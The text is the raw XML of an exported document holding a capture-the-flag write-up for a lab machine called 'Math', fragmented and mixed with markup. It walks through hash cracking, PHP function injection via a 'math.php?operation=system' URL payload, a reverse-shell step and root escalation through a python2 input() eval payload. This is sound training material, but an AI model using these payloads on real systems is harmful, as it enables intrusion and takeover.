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MATH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umpsdwky5ob6"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v2r5xqpdd4s9"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689100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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tfjcmlxpwuo7" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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5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some attempts using default credentials such as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guest:guest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc., we were unsuccessful.</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perform fuzzing on this application to find possible relevant files or directories. For this, I will use the tool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5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file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and extracting it, we gain access to the application's source code.</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file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find the access credentials, but first we need to crack the hash using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat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6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log into the application.</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7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5146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After logging in, we are redirected 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Here we see a website still under development, whose objective is to help students solve mathematical operations. We can continue performing a code review.</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6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we see that if the parameter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set and its value is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">math</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will be redirected to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/math.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can take a look at the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">math.php</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6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have some mathematical functions where we control the following parameters:</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if(isset($_GET['operation']) &amp;&amp; isset($_GET['firstNum']) &amp;&amp; isset($_GET['secondNum'])){</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 = $_GET['operation'];</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 = $_GET['firstNum'];</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 = $_GET['secondNum'];</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$reult = $_GET['operation']($_GET['firstNum'], $_GET['secondNum']);</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$reult;</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Function Injection</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control the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">operation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we can call functions that are not defined in the code, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>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exec()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc. I will use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>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Because the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>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function expects a parameter, we can abuse the second parameter defined in the code → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">firstNum</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, passing the value </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>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/math.php?operation=system&amp;firstNum=id&amp;secondNum=1</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31900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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2f1prjxci8ue" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell:</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Note: URL encode it →</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId17">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5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7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3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2dd0cvwzl116" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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346200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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91adb1728vgg" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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193800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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home directory of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can find our first flag.</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5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the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">note.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find a password. We can try to use it to switch to user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f4</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282700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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gro5mi2rig3t" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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see that we have permission to execute the script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verify.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with root privileges without needing to provide the password.</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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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read this script.</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7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it is just a script that receives a file name as an argument and checks whether it exists. One detail that stands out is that the script is written in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">input()</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4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check what this method means using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help(input):</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46200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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see that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">input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is equivalent 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eval(raw_input)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Knowing this, we have an RCE 🙂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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ei1j589cugbk" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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__import__('os').system('/bin/bash')</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00100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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retrieve the final flag located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>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231900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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with that, the challenge is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>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F">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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1" name="image9.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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8.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image8.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Math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2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8.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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6.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17.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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image" Target="media/image16.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><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hyperlink" Target="https://urlencode.org/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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tsGjt9rqBXKXzRhPTm7Sn1BbA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnVtcHNkd2t5NW9iNjIOaC52MnI1eHFwZGQ0czkyDmgudGZqY21seHB3dW83Mg5oLjJmMXByanhjaTh1ZTIOaC4yZGQwY3Z3emwxMTYyDmguOTFhZGIxNzI4dmdnMg5oLmdybzVtaTJyaWczdDIOaC5laTFqNTg5Y3VnYmsyDmguMTc1ZjVjczk0ejBvOAByITE5ZjBrYkNNN01adUhiYlZqVFhIUEl2c010RndXNDlw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